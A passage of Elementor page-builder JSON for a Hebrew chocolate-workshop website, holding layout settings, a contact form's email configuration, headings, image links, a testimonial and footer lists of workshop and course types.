\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 